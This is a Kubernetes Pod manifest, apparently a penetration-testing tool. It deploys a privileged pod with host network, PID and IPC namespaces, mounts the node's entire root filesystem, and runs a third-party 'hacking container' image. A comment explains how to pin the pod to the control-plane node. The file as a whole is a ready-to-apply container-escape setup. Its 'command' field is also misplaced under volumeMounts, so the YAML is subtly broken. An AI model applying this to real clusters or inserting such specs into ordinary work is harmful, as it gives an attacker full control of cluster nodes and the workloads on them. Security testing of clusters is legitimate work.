apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: beserkerbob/hackingcontainerkubernetes:0.2
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
      command: [ "sleep", "infinity"]

  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
  volumes:
  - name: noderoot
    hostPath:
      path: /
